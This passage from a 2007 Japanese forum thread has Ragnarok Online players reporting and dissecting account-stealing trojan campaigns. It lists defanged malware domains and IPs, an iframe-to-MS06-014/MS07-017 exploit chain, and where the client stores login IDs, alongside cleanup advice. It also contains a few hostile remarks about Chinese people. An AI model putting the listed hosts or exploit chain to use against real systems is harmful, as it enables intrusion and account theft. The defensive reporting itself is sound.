214 名前:(^ー^*)ノ〜さん:07/05/07 22:14 ID:DHREqoVF0
今のInternetは、WhiteList以外は全てグレーと考えるべき、な状態。
FirefoxアドインのNoScriptも、そういった発想の元に設計されている。
IE5.5の頃までは、net性善説に基づいたデフォルト設定がなされていたが、そういう時代では無くなったという事。

mail spam対策を目的としたGreyListingは存在するが、これをそのままwebに応用するのは難しそう。
最終的に、攻撃を回避できる、すり抜けてきた攻撃を受けても迅速に復旧できる環境を構築するのが、現段階での上策。

215 名前:(^ー^*)ノ〜さん:07/05/08 00:30 ID:HYrx0IVe0
知り合いの所に張られてた書き込み。
成りすましは相変わらずですね…。
-----以下書き込み

タイトル通りギルドブレイクをしようと思っています。
理由はキャラの作り直しのためです。
アルケミもレベル77になりましたがまた1から、ノビからやり直したいと思っています。それに伴
いギルドも一度壊さないといけません。またすぐ作り直す予定ではありますが、ギルドブレイク
についてみんなと相談したいなと思ってスレ立ててみました。反対意見がなければブレイクし
ます。突然ですいませんがよろしくおねがいします〜><

Posted by レティシア at May 05, 2007 00:32
--------ここまで
で、名前のところにURLで
www■mbspro6uic■com/mbsplink

ソースチェッカー
IP:125.65.112.91(Chinanet Sichuan Province Network)
手繰っていくと
インラインフレームで mbsp.cur と仕込まれています。

先ほどのhostsリスト更新分に含まれていたので更新してからスキャンしに行ってきます。

216 名前:(^ー^*)ノ〜さん:07/05/08 02:02 ID:4uSAocLq0
垢ハックじゃないけど
先週からWindows2000+カスペルスキーで
nProがカスペに反応してROを落すようになったMyPC orz

217 名前:(^ー^*)ノ〜さん:07/05/08 02:22 ID:aN5k4URY0
カスペがnProを挙動の怪しいプログラムとして検出するという話は聞いたことがあるけど、
逆のパターンもあるのか・・・よっぽど相性が悪いんやね。その2人は

218 名前:(^ー^*)ノ〜さん:07/05/08 02:25 ID:52ec3/q70
むしろnProがどうも・・・
現状全くBOTを止められないくせに重いは挙動おかしいわもうね

219 名前:(^ー^*)ノ〜さん:07/05/08 03:42 ID:DMhvCIa30
中華のアカハックを止めてくれるカスペ!
そのカスペの邪魔をする癌胞のnPro!つまり癌胞は・・・
冗談はさておき、ちょっとその辺癌胞に送ってカスペに反応しないようにしてもらうしかないんじゃないか。

220 名前:(^ー^*)ノ〜さん:07/05/08 08:58 ID:nCCzaunC0
ここ暫くnProって更新されてないような。
それにWin2k+カスペの組み合わせってそんなにレアな構成でもないだろうし
常にその構成でプレイ出来ないなら、もう少し騒ぎになってる気がする。

取りあえずこちらで聞いてきてはどうだろうか?
>いろんなエラーに悩まされている人の相談室 その21
>ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1178541870/

221 名前:(^ー^*)ノ〜さん:07/05/08 09:06 ID:sTfKqeqB0
カスペの設定をきつくしすぎている気もするな

Win2k+カスペだが、いまはチケット切れなので確認出来ない

222 名前:(^ー^*)ノ〜さん:07/05/08 09:24 ID:U35N6RN+0
>>221
nProの挙動見るだけならタイトル画面まで進むだけでわかるんじゃない?

223 名前:(^ー^*)ノ〜さん:07/05/08 09:41 ID:JDV0/2K70
RO起動したの3ヶ月ぶりの俺様がきましたよ。

win2ksp4
kis6.0.2.671英語版

この状況でログイン画面まで正常に行けました。
課金してないのでそれ以降は不明だが問題ないと思われ。

224 名前:(^ー^*)ノ〜さん:07/05/08 17:19 ID:iLiMAQNh0
ハックされるような奴ってバカが多いな

225 名前:(^ー^*)ノ〜さん:07/05/08 17:49 ID:Mz1gxkWR0
Eirのプロで現在被害者が抗議中ですwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

226 名前:(^ー^*)ノ〜さん:07/05/08 17:53 ID:iLiMAQNh0
>>225
正直笑った
被害者がバカすぎる
しかも装備が戻ってくると思っているし
さらに犯人が日本人だと思っている

227 名前:(^ー^*)ノ〜さん:07/05/08 17:56 ID:Mz1gxkWR0
友人のサイトに怪しいURLがあったから消そうとして間違えてクリックしたらしいけどさ
クリックしたあとに何でログインしたんだろうね
ログインしたらID、パスワードを業者に知られるに決まってるんだよ

228 名前:(^ー^*)ノ〜さん:07/05/08 17:58 ID:iLiMAQNh0
あと、多分この書き込みだと思うけど

狩友達募集です^^ 紅夏 2007/04/06 09:49:00

久しぶりに復帰したのでお友達を募集したいです
男性、女性どちらでも構いません
当方のキャラ:みそかつ.ゴッグ
LV89「シールドチェーン型パラディン」
接続時間:19:00ぐらいから24時ぐらいまで「平日」
連絡方法:夜20時〜23時ぐらいにwisか書き込んでくださいな
※Gは入ってないのでどこか入れてもらえるとありがたいです。
そのさいはGの名前等詳しく書き込んでくださいね
Gvは基本的に仕事が休みの日は参加します。
※使ってるスキル一例
シールドチェーン5プレッシャー5HX6GX4こんなもんです
http://www■fcty-net■com

天国の装備は売買します MMOファイナンス 2007/04/04 15:35:50

本人は長期にわたり天国の遊ぶ各種の装備を売って、中の伝言を招く装備しなければならないのがあって、ウェブサイトの中に本人の連絡用電話があります:http://www■blog-livedoor■net/game/


こんなん踏むのもどうかしてる

229 名前:(^ー^*)ノ〜さん:07/05/08 18:02 ID:Mz1gxkWR0
こういうスレを見てないんだろうな
危機に対する意識が低すぎ
自分は被害に遭わないと思ってたら大間違いだ

230 名前:(^ー^*)ノ〜さん:07/05/08 18:02 ID:sTfKqeqB0
間違えてクリックというのは誰にでも起こりえることだが、
問題なのは対策を全くしていないってことだな

231 名前:(^ー^*)ノ〜さん:07/05/08 18:07 ID:avKUgDlK0
危機に対する意識がかけているのは確かだが、しかし誰もがこういったスレを見ているわけでもない。
さすがに被害者に対して口が悪いぞ。

232 名前:(^ー^*)ノ〜さん:07/05/08 18:07 ID:Mz1gxkWR0
ゲーム内で言い争いに発展してんだけどw

233 名前:(^ー^*)ノ〜さん:07/05/08 18:09 ID:2q83JbrH0
いい加減ウザイ。続けたいなら鯖板にでも行けよ。

234 名前:(^ー^*)ノ〜さん:07/05/08 18:09 ID:mcnwVOOY0
>>231
触ったら負けだ、冷やかしに来てるのは目に見えてるからスルー汁

235 名前:(^ー^*)ノ〜さん:07/05/08 18:23 ID:nCCzaunC0
そういえばRO内で知り合った何人かに、PG2とhosts変更を勧めたんだが、にゅ缶自体
見てない人が多かった。
当然このスレやまとめサイトの存在は知らなかった。

ownが無くなってからこっち、情報の入手手段が無い、って人が多いっぽい。


>自分は被害に遭わないと思ってたら大間違いだ
これは被害者を卑下してるんじゃなくて、自分自身に対しても戒めてる言葉だよな?

万能の対策が無い以上、自分自身が被害者になる可能性はいつだってある。
そう考えるとハク被害者を馬鹿にするような発言は、単に慢心してるだけにしか
見えないわけで。

過信・慢心は怪我の元。
自分含め、全ての人はご注意を。

236 名前:(^ー^*)ノ〜さん:07/05/08 18:55 ID:U35N6RN+0
もしOWNが残ってて、まとめサイトへリンク貼ってもらえてたら、少なくとも意識レベルは違ってたかもしれないな。

237 名前:(^ー^*)ノ〜さん:07/05/08 19:13 ID:CsADd5VD0
多くのMaran(例 >>68 )が今朝7時頃新型に差し替えられた模様。

238 名前:(^ー^*)ノ〜さん:07/05/08 19:48 ID:DpaSZmCp0
今現在残っている大手ファンサイトやらに
アクセス数が多そうなROサイトにアカウントハックの注意を呼びかけて
対策スレのまとめサイトに誘導するようにお願いするとかどうなんだろう。
と思って、とりあえずブックマークラグナロクに一言で送ってみた。

自分の場合は運良く対策スレを知る事が出来たけど、
正直対策を知らない人や自衛していない人は
目隠ししてビルとビルの間を綱渡りしているような物だ。


ここからチラシの裏↓

知っていた所で気休めに過ぎないのは確かなのだけど。
常に警戒を怠らないように。

サイトを見るときや新しいサイトに飛んだりしたら
マウスのボタンから指を離して操作しています。
銃のトリガーに常時指をかけていたら危ないのと同じで
いつ事故るか判らない…。

こういうのは臆病なぐらいがちょうどいいってじっちゃがいってた。

239 名前:(^ー^*)ノ〜さん:07/05/08 20:37 ID:avKUgDlK0
今で言えばR.O.M776さんくらいかのぅ。
あそこはたまに注意の呼びかけやってくれている気がする。

240 名前:(^ー^*)ノ〜さん:07/05/08 21:08 ID:RzRFhXrM0
公式は声かけないけどな

241 名前:(^ー^*)ノ〜さん:07/05/08 21:11 ID:aN5k4URY0
>>195の構成が変わってた。

www■twurbbs■com = www■gamanir■com = 125■65■112■93

@ www■twurbbs■com/
A www■gamanir■com/614.htm
B www■gamanir■com/072.html
C www■gamanir■com/miansha.gif  (EXPL_ANICMOO.GEN)
D www■gamanir■com/2007mmm.exe  (TSPY_MARAN.KX)
※括弧内はウイルスバスター(TrendMicro)でのウイルス名

@ → AB    (IFRAME x 2個)
A → D     (VBScript MS06-014脆弱性利用)
B → C → D  (ANIカーソル MS07-017脆弱性利用)

Dのファイルが結構でかくて、105984バイトもあり、なかなか落ちてこなかった。
こんなに重いんじゃ踏んでも感染しないんじゃないかと思うぐらい重かった。
まあタイミング次第ではさくっと落ちてくるが・・・

Dに関しては、VirusTotalで検出可なのは下記の通り。
AntiVir、Avast、AVG、BitDefender、CAT-QuickHeal、DrWeb、eSafe
Ewido、F-Secure、Ikarus、Kaspersky、McAfee、Microsoft、NOD32v2
Panda、Sunbelt、TheHacker、Webwasher-Gateway

242 名前:216:07/05/08 23:41 ID:4uSAocLq0
アドバイスありがとうございます。
カスペver6.0.2.614日本語

落ちるタイミングはログイン→キャラセレ→フィールドにキャラ出てきて数秒後
ってところです。
保護の一時停止中ならゲーム続行可能

昨日はKASの再インスコしてみました→ダメ
ROクライアントの再インスコしてみます。
ダメならエラー板行きを検討します。

スレ違い失礼しました

243 名前:(^ー^*)ノ〜さん:07/05/08 23:52 ID:ympt0OwN0
>>242
それは、nProが更新されたので、前のVerのnProは通信許可してるのに、現在のVerは許可出してないだけじゃ。
カスペのFWの設定をよ〜〜〜く見直せ。そして、踏んじまった場合の相談じゃないし、LiveROに移動しような。

244 名前:(^ー^*)ノ〜さん:07/05/09 03:01 ID:ZlYB4jnV0
危険URLに指定されている23stylesのURLを踏んでしまいました
アクセス先は/bbs となっていたんですが、リンクを踏んで2秒後くらいにブラウザバック
その間画面は真っ白でした。
一応、即ROにアクセスし、ギルメンに高額装備を預けた後
スパイウェア検索とウイルス検索をしました(VB2007最新)
ウイルスはゼロ。スパイウェアは20件ほどでアドウェアも含め全部削除しました。
VVSNというフォルダ関係のアドウェアは削除後
トレンドマイクロでそのスパイウェアに指定されたレジストリの値を削除して
ほかのアドウェアも対処しようとしましたがレジストリがなかったので放置(?)

値を削除した後にGungHoGamesでガンホーパスとアトラクションパスを変更しましたが
ハックされてると・・・おもうなぁ・・・。どうでしょうか?
WinUpdateは完了済みですが、無理だとおもいますか?
思いつく限りで抜けてる対処法があれば教えてくださいorz
WindowsXPsp2 最新更新済み ウィルスバスター2007

245 名前:(^ー^*)ノ〜さん:07/05/09 03:21 ID:ya+govou0
>>244
>一応、即ROにアクセスし、ギルメンに高額装備を預けた後
>値を削除した後にGungHoGamesでガンホーパスとアトラクションパスを変更しましたが

それは別PCでやったのかな?
間違っても感染したPCでやってはいけないよ。

246 名前:244:07/05/09 03:30 ID:ZlYB4jnV0
同じPCでやってしまったorz
でも変更前にウイルススパウウェアゼロを確認して、システム復元もしたんですが
駄目でしたかね。。。
OS再インストールはめんどうだけど最悪せねばならんでしょうか

247 名前:(^ー^*)ノ〜さん:07/05/09 03:45 ID:X6rDmanh0
不安ならOS入れ直せばいいじゃない

自分で大丈夫だと思ってるならOS再インスコしなくても構わないが
なにがあっても自己責任で。

248 名前:(^ー^*)ノ〜さん:07/05/09 03:51 ID:ya+govou0
244氏に限らず、どうも基本的なことが分かってない人が結構いるような気がした。

PCが情報漏えい型ウイルス感染するということは、リアルでいえば盗聴器を仕掛けられるようなもので、
盗聴器を仕掛けるよりも、前に行われた会話を盗聴されることってありえないよね?
同じ理屈で、PCが感染するよりも前に打ち込んだパスが抜かれることもありえないよね?

つまり、感染したと自覚してたのなら、ROにもアトラクションセンターにも繋がなければ、
パスワードを抜かれることはありえないのですよ。
(パスワードを書いたファイルをHDD上に保存しておいたとかなら、また話は別だけどね)


まあ、過ぎたことを言っても、あとの祭りなので、これからの対処方法。
確実なのはOSを再インストールした後、パスを変更する。
最近の中華の手口を見る限りはWindows Updateしてれば防げる可能性は非常に高いんだけどね。
ま、あなたのPCにどんなセキュリティホールがあるかも分からないし、確認しようもないので、
OS再インストール以外のアドバイスはできません。

249 名前:248:07/05/09 04:36 ID:ya+govou0
248の補足。

ROログイン時にIDの横のkeepにチェックを入れてる人は、
レジストリにアトラクションIDが保存されてしまうので注意。

HKEY_LOCAL_MACHINE\SOFTWARE\Gravity Soft\Ragnarok の中のIDに保存されます。
keepを外して、もう1回ログインすれば、保存されたIDは消えます。

keepしてる人は、もしかしたら罠を踏んだ瞬間にIDを抜かれるかも(パスは抜かれませんよ)。
たとえIDだけでも、抜かれるとそれだけ安全性が下がるので、なるべくkeepは使わない方が良いでしょう。
特にネカフェでプレイするときは、keepがチェックされてたら必ず外してからログインしましょう。

あとパスワードは当然ながら、どこにも保存されません。
されたらネカフェではプレイできないゲームになっちゃうしね・・・
(どっちにしても、ネカフェではあんまりプレイしない方がいいけど)

250 名前:(^ー^*)ノ〜さん:07/05/09 09:41 ID:UMBfr9FG0
>244
テンプレに基づいて報告しないと答えにくい部分があるんだが、まだ感染してる
可能性がある。

>18>22を見る限り23styleは今もMaranが仕掛けられてる可能性があり、>237
見る限り、新型が設置されてた可能性がある。
バスターはフットワークが軽いとは言えないし、VB2007が見落とす可能性もある。

WindowsUpdateしてたのなら感染してない可能性もあるし、システムの復元したなら
レジストリが戻って安全になってたかもしれないけど、なんとも言えない。

まずは安全な環境から再度パス変更。
それからカスペのオンラインスキャンを使って再度検索。
それで見つからなかったとしても、不安が残るならOS再インストール。

251 名前:244:07/05/09 10:25 ID:ZlYB4jnV0
>>250
一応言われてからカスペで再検索かけてみましたがなにもありませんでした。
wikiのほうは私の書き込み後にアカハックアドレスだったとして書き換えられていました。
今のところRO内では変化ないです。
1週間程度狩り等は休止して、様子を見てみます。
普通はどれくらいでアイテム盗まれるんでしょうかね

不安でいまいち地に足がついてない状態なので、近日中にOSは再インストールして
キャラもガンホーIDも作り直そうと思います。
課金済みだったのがきっついですが(汗)

252 名前:(^ー^*)ノ〜さん:07/05/09 10:41 ID:f46IKqcW0
>>250
ドロップするのは >>22 と同じだけど、
このro.exe(Maran)は4日に更新されてる。
同じく4日に差し替えられている >>203 とほぼ同じかと。

253 名前:(^ー^*)ノ〜さん:07/05/09 11:49 ID:UMBfr9FG0
やっぱりテンプレ使ってもらわないと書きにくい。

>251
現行OS使ってて4月分のWindowsUpdateもしてたのなら、カスペでも検出されてないなら
「多分」感染してない。
>252の情報もあるし未然に防げてた可能性が高い。

ただ絶対とは誰にも言えないので「安全な環境から」パス変更は必須で早急に行う事。
安全な環境についてはテンプレ参照。

トロイのチェック・駆除はその後。
安全な環境からパス変更さえしてしまえば、ログイン等をしない限り抜かれる恐れはないし
もし既に抜かれていても、パス変更してるから被害に合わない。

ログインは厳禁なので被害確認も出来ないが、今現在ハク犯にログインされていないという
想定の上、安全な環境からパス変更。
パス変更さえしてしまえば、後はゆっくり対応できる。

254 名前:(^ー^*)ノ〜さん:07/05/09 12:20 ID:UMBfr9FG0
それと新垢取ってキャラ作り直しって、安全ではあるが個人的にはあまり意味が無いと思う。

感染しててIDがバレてる場合はブルートフォースに弱くなってるのは事実。
でもブルートフォースは基本的にオフラインでやるもの。
オンラインの場合は鯖が返す時間があるから、いくら鯖やクラックPC、通信環境が
良くても限界がある。

数字だけのパスでも10桁とかあれば、軽く年単位の時間がかかる。
さらに無作為の英数文字で長い桁数のパスを設定すれば、ブルートフォースで抜くのは
非現実的。

そう考えると、完全新垢の方が安全なのは確かだけど、今までの垢を捨てるほどの事じゃ
ないと思う。

255 名前:(^ー^*)ノ〜さん:07/05/09 13:00 ID:/dLcxI7+0
この程度でまだ被害も確認されてないのに新垢とかアッガイかよ
課金済みだったのがきっついとかいう問題じゃねえだろ

256 名前:(^ー^*)ノ〜さん:07/05/09 14:02 ID:JZX1lWenO
たまにアッガイってでるけど、どういう意味?

257 名前:(^ー^*)ノ〜さん:07/05/09 14:17 ID:3DT5mYr/0
アッガイ
1.ジオン公国軍の量産型水陸両用モビルスーツ
2.垢買い

258 名前:(^ー^*)ノ〜さん:07/05/09 14:23 ID:2Gf8AAYU0
>>255
高額装備は既にギルメンに渡してるみたいだし
キャラ作り直しに関しては苦労と感じるかは人それぞれじゃね?
育成環境も違うしな。
お前さんが感じてるキャラ等の価値と
他人が感じるキャラの価値は等しくないっての忘れちゃいかん。

>>256
アカウント買い>アカ買い>アッガイ

259 名前:(^ー^*)ノ〜さん:07/05/09 17:34 ID:+l1HQU9V0
唐突だけど、>>6にある

 ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
  :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

って無効じゃなくて有効にしなきゃいけないんじゃないのか?

260 名前:(^ー^*)ノ〜さん:07/05/09 17:55 ID:XGnMo3GE0
>>259
有効にすると「拡張子ではなく、内容によってファイルを開く」ようになる。
無効にすると「内容ではなく、拡張子によってファイルを開く」ようになる。
つまり、有効にすると中身exeで拡張子jpgのファイルをexeとして実行してしまうわけだ。
無効にすればjpgとして開こうとするが、当然開けないので実行して感染してしまうことはない。
どこも間違ってないぞ。

261 名前:(^ー^*)ノ〜さん:07/05/09 18:08 ID:llEc2Zfu0
>>244,251
なんというか最初から諦めの境地な理由が分からん。むしろこれから何を為すかじゃないのか??
踏んだのが↓なのかは知らんけど。

@ www■23styles■com/bbs/     (VBScript MS06-014脆弱性利用でAをダウンロード)
A www■ezbbsy■com/bbs/ro■exe   (UPack maran。ウイルスバスターでのウイルス名TSPY_MARAN.D)

どこまで当てになるのか分からないけど、SCOでの@AのLast-Modifiedの時刻は↓
@ Sat, 21 Apr 2007 06:59:34 GMT
A Wed, 09 May 2007 06:38:42 GMT

ちなみにカスペでは@Aともに検出できる。ウイルス名は↓
@ Trojan-Downloader.VBS.Psyme.gj
A Trojan-PSW.Win32.Maran.cj

感染条件は順当に考えれば、IE系ブラウザをつかってて、アクティブスクリプトとActiveXを有効にしてて、
Window Updateを長期間してなくて、ウイルス対策ソフトを入れてなくて、PG2やhostsによるブロックをしてないこと。
(ウイルス対策ソフトはすり抜ける可能性もあるけど、VIRUSTOTALで調べた限りは検出率はメチャ良いよ)

ま、上記は例外もあるので、不安ならOS再インストール推奨ってのは変わらない。
このスレで推奨されてるhosts変更やPG2を導入してれば、そもそも踏むことすらなかったわけで、
今後は事前の対策を十分にすることをお勧めするよ。
OS再インストールしても、何の対策も打たなかったら、また同じ目に遭うよ。

262 名前:(^ー^*)ノ〜さん:07/05/09 18:14 ID:+l1HQU9V0
>>260
ごめん、何か勘違いしてたみたいだ・・・。
ということは、たしかBSWikiのセキュリティ対策ページには反対のことが書かれていたと思うから
あっちは間違ったままになってしまってるんだね。

263 名前:244:07/05/09 18:36 ID:ZlYB4jnV0
一応遅いですがテンプレも
【  アドレス   】 www■23styles■com/bbs/
【気付いた日時】 2007/05/09 深夜2時頃
【     OS    】 WindowsXP sp2
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 踏んだ前の最後の更新は2007/04/25
XP用の更新プログラム(KB934238)

【 アンチウイルスソフト 】ウイルスバスター2007
【その他のSecurty対策 】
【 ウイルススキャン結果】 カスペオンラインスキャンは無検出でした
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
ホムの各種wikiのあるhttp://www15■atwiki■jp/x_homu/にて
トップページに.com系のURLに注意!と書かれているにもかかわらず
レベル81-90の場所にのみ仕掛けられたアドレスを踏みました
クリック後いままでパッと表示されていたのにIE画面が白くなり、アドレスの所に気がつき
2秒から3秒程度たつ前にブラウザバック。
アカハックのまとめサイトの危険URLで確認後、ROで装備を渡し
VB2007でスパイウェアとウィルスの検索。
ウイルスは無し、スパイウェアは削除してレジストリの値も変更しました。
確認後、再度ガンホーIDトアカウントIDのパスを変更。今に至ります。
ゼロからの復帰1ヶ月目でしたので、何とかなるといえばなんとかなるんですが・・・。

>>261
23styleからはどこにも飛んでなかったと思います。
Last-Modifiedの時刻というのはどういった意味があるのでしょうか?

ひと段落したらhosts変更やPG2とやらもやってみようと思います。
本当に危ない世界になったなぁ、と身にしみております(;;)
今現在、被害は出ていない模様です。

264 名前:244:07/05/09 19:19 ID:ZlYB4jnV0
追記ですが今朝9時の段階でカスペでオンラインスキャンしましたが無傷。
先ほどPG2を導入して、ROアカハクまとめサイトのリストと
リネージュ資料室のリスト2つをブロック追加しました。

265 名前:261:07/05/09 19:19 ID:llEc2Zfu0
>>263
Last-ModifiedってのはHTTPレスポンスヘッダに含まれる情報で、
これからダウンロードしようとするファイルの最終更新日時のこと。
ローカルで作成したときの最終更新日時なのか、
それをサーバーに上げた時間が最終更新日時になるのかは知らない。
詳細はググって調べてください。

サーバー自体が敵の管理下にある以上、その気になれば、
嘘の日時を返すこともできるので、信頼しきるのはやばいんだけど、
もし、正しい日時を返してたとすれば、@のスクリプトは先月21日以降変化しておらず、
Aのトロイ本体はつい3〜4時間前に置き換えられたということに・・・
(261書いたときにGMTの解釈を勘違いしてた。GMT+9時間=日本時間なのに、GMT-9時間してたorz)

Windows Updateしてれば、@の時点でブロックされるから、Aは落ちてこない。
したがって感染はしないし、落ちてこないものはバスターで検出されるはずもない。
というのが、まあ順当な解釈。(例外はあるから保証はしないよ)

最終的にどうするかは自己責任でよろしく。

266 名前:(^ー^*)ノ〜さん:07/05/09 19:35 ID:UMBfr9FG0
>264
カスペはほぼ1時間ごとにパターンファイルが更新(追加)されるので、気になるなら
時々チェックした方が安心できるかも。

それとPG2だけでは片手落ちなので、hostsの変更も併せて導入した方がいい。
まとめサイトとリネージュ資料室のリストをPG2に入れたのなら、hostsも
両サイトの内容を入れた方が漏れが無い。

PG2のリストは自動更新するが、hostsは自分の手で更新する必要がある。
割とサボりがちになるが、サボって被害に遭ったら元も子もない。
マメに更新した方がいい。

267 名前:(^ー^*)ノ〜さん:07/05/09 21:40 ID:cpsK8vQy0
>>244氏へ
どうやらこっちの方が進んでるようなので
776に書いた方は削除依頼出しとけ?マルチいかんぞw

268 名前:244:07/05/09 22:04 ID:ZlYB4jnV0
ウイルスバスターでウィルススパイウェアかけても、カスペで検索しても大丈夫そうなので
どうも無事な様子です
一応対策には念をいれますが。
ありがとうございました

>>267さん
マルチだめなんですね^^;削除依頼だしておきました
ご指摘ありがとうございました。

269 名前:(^ー^*)ノ〜さん:07/05/09 22:29 ID:ZcNr7BDt0
>266
サボりがちなら、あこすれてんぷら避難所にあるhosts更新スクリプトを
使えばいいんじゃないの?
勿論自己責任で、だけど。

270 名前:(^ー^*)ノ〜さん:07/05/10 01:08 ID:rQvJmdtg0
某ドット絵・掲示板サイトの書き込みなんだが
--------------------------------------------------
属性武器の銘が名無しになる時(... 投稿者:雲 OFSfb-10p2-147.ppp11.odn.ad.jp 219.66.191.147

先月パンダカートになったソロの製造BSです。モチベーションが下がったと言えば格好付けですが、後2月程で課金が切れてチャージはしないつもりです。
心残りは自分で打った属性武器が名無しになる事です。キャラが居なくなれば名無しになる、の表現は既知ですが。削除したり、
削除せずに課金が切れた状態で、半年チャージしないでれば名無しになるんですよね?名無しにしない為、半年未満に1Dayチケット一枚なら買っちゃうし。
10枚は必要にもならないでしょうし。違うよって方、教えていただけないでしょうか。アトラクションセンターに聞く、のが正解の1つですが...。
有りがちの不運で、関わりたくも無いのです、すいません。

UTL : http://www●jpxpie6-7net●com/web/read_cgi/
ご覧下さい
------------------------------------------------------------------
Re: 属性武器の銘が名無しになる... 陸バカ 46.215.58.59.board.ly.fj.dynamic.163data.com.cn
【ギルド名】--------------
【現M数/平均lv】31名/lv70
【G構想】マッタリでも賑やかなGを
【GVG】非参加
【定例狩り】毎週金曜日22時〜
【IN率】毎日平均10名程で21時〜深夜にかけて上がります
【特徴】マッタリ風味。会話と狩りが盛んです
【溜り場】プロンテラ内
【多い職業】支援職(転生5名、転生前5名>Lv70〜90)

◆GM募集
【募集数】1〜3名
【条件】Lv職業不問ですがIN率は夜中接続以上
【加入後】2週間程は体験メンバーとなり以降正規メンバーへ

◆友好ギルド募集
毎週金曜日一緒に合同狩りしませんか的なコンセプトです
毎週でなくても可。新設G歓迎☆
【条件】溜り場がプロンテラ内かその周辺でGv非参加ギルド
http://www●omakase-net●com/
---------------------------------------------------------------
の2件。 ギルド名は伏せました。

綺麗にホストが出てるんだけど、こっからプロバ側でBANとか・・・無理ですかね・・・

271 名前:(^ー^*)ノ〜さん:07/05/10 01:19 ID:ODtlFBve0
日時とIPを添えてプロバにメール発射しとけば?
何もしないよりいいだろ。

272 名前:(^ー^*)ノ〜さん:07/05/10 01:19 ID:slDr9nQQ0
BANというか、アクセス制限が良いところかと。
fj.dynamic.163data.com.cnって有名すぎるぐらいの中華だし。

273 名前:(^ー^*)ノ〜さん:07/05/10 01:20 ID:voDkgEU50
報告乙。

ウィルス(トロイ)配布サイトの宣伝をspam投稿したという報告をプロバイダに上げることで
プロバイダと回線契約者の契約解除に繋がる可能性は高い。だが、それ以上の効能は可能性すらない。

プロバイダへの報告窓口の探し方は判るか?
そいつがブラックリストに載って、回線契約できなくなるなら万々歳なんで頑張って報告してみてくれ。

OFSfb-10p2-147.ppp11.odn.ad.jp 219.66.191.147 -> abuse@odn.ad.jp
46.215.58.59.board.ly.fj.dynamic.163data.com.cn -> CNなので英語堪能でなければ諦めよう
  spam@jsinfo.net , anti-spam@ns.chinanet.cn.net , anti_spam@wz.zj.cn , antispam@dcb.hz.zj.cn

274 名前:(^ー^*)ノ〜さん:07/05/10 04:52 ID:9q1h/Ie10
spam通報は精力的に行うべき。
だが、ODNの場合は、過度の期待は禁物。
日本テレコム時代はそれなりの対応があったが、SB配下になってからどうにも動きが悪くなった。
業者spam対策のまとめサイトでも、
>ODN
>* ここも規制対応が遅いので慶征監理が良く利用している。
と辛口の評価を受けている。

275 名前:(^ー^*)ノ〜さん:07/05/10 07:56 ID:jiFpH3OX0
>>270
そのODNホスト、リネージュ資料室のハエ取り紙(拒否履歴)に大量にかかっている。
2007/05/09 22:18:30 から 2007/05/09 23:04:03 まで16回。

下のは言うまでも無く福建人の生IPだろうね。
殆どの罠ドメイン登録地と同じ場所( 福建省:fj 竜岩市:ly )だし。

276 名前:(^ー^*)ノ〜さん:07/05/10 13:14 ID:m85dNPoz0
この福建人とやら、1万人のROプレイヤーの前に引きずり出して・・・
 

 ∧_∧
 ( ・ω・)=つ≡つ ボコボコにしたいな、おい
 (っ ≡つ=つ
 /   ) ババババ
 ( / ̄∪

277 名前:(^ー^*)ノ〜さん:07/05/10 21:40 ID:VV6N17oM0
>>270 の www●omakase-net●com
いつもの中華ドメインかと思ったら国内の個人サイトだった。
メールを送ってみたら罠は撤去されたけど、再発防止に
何をしたのかは不明なのでまた食われる可能性はある。

# きちんと管理できない自宅サーバはレンサバなどより遥かに危険。

278 名前:(^ー^*)ノ〜さん:07/05/10 23:35 ID:gI/dIQ8B0
カスペルスキー オンラインスキャナ バージョン: 5.0.78.0
Microsoft Windows XP Professional, Service Pack 3

貰ったウィルス:Trojan-PSW.Win32.Maran.ei

C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\tj9viewer.dll

に感染していたのですが、どの様に対処すればいいのか…;;

279 名前:(^ー^*)ノ〜さん:07/05/10 23:54 ID:8LGunp4w0
そりゃテンプレ見てないなら、FAQも見てないわな。

280 名前:(^ー^*)ノ〜さん:07/05/10 23:58 ID:slDr9nQQ0
>278
まず最初にする事は、このスレのテンプレを読む事だ。
それからテンプレに従って再度報告。

281 名前:(^ー^*)ノ〜さん:07/05/11 00:03 ID:lpnLSScn0
>>278
とりあえず、パスワードが必要なサイトやゲームにログインしない限り
ハックされることはないから落ち着いて対処方法を読むんだ


  そ れ ま で は 絶 対 ロ グ イ ン す る な よ !!
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

282 名前:(^ー^*)ノ〜さん:07/05/11 00:13 ID:JBBhwV5s0
>>278
XPProSP3ワロスwwwwww

283 名前:(^ー^*)ノ〜さん:07/05/11 00:39 ID:FNh0v85i0
ここでのお馴染みchinanet CN、不正コードを世界に撒き散らすとして槍玉に挙げられる。
ttp://opentechpress.jp/security/article.pl?sid=07%2F05%2F09%2F0344245

中国政府(外局?)のspam対応窓口アカウント、機能停止。
ttp://www2g.biglobe.ne.jp/~stakasa/nospam_bbs/past/log/022967.html

毒物を市場に流通させるような国家は、Internetからも締め出していい時期が来ているかもしれない。

284 名前:(^ー^*)ノ〜さん:07/05/11 00:57 ID:AYk/R/t80
>278
少し前のレスを読めば判るが、テンプレを埋めて貰わないと
的確なアドバイスとかが無理なわけで。
答える側も推測混じりで答えるので、ズレが出来る。

取りあえず、カスペのオンラインスキャンで見つかったのなら
カスペの体験版をDLしてきて、それで駆除すればいい。

あと発見に至る過程がどうだったのか。
先に「安全な環境から」パス変更をしないと手遅れになる場合もある。

踏んだ事に気付いてスキャンしたのか、何気なくスキャンしたら
見つかったのか。
罠を踏んでからログインしてしまったのか、まだしてないのか。
それすらも判らないのか。

それらの状況・状態によって、最優先で取る行動が変わる。

285 名前:(^ー^*)ノ〜さん:07/05/11 00:59 ID:TxDu654m0
リアルだけじゃなくネット上でも毒バラ撒いてるってホント救いようがないな

286 名前:(^ー^*)ノ〜さん:07/05/11 01:12 ID:yYm9j/Wj0
放置露店していて…サバキャンしていたので、再度キャラセレ画面に
行ったら…装備、z、倉庫等全部ないと言ったところなのです…

287 名前:(^ー^*)ノ〜さん:07/05/11 01:36 ID:AYk/R/t80
>286
南無……
日が変わってID変わってるから確認するが、>278

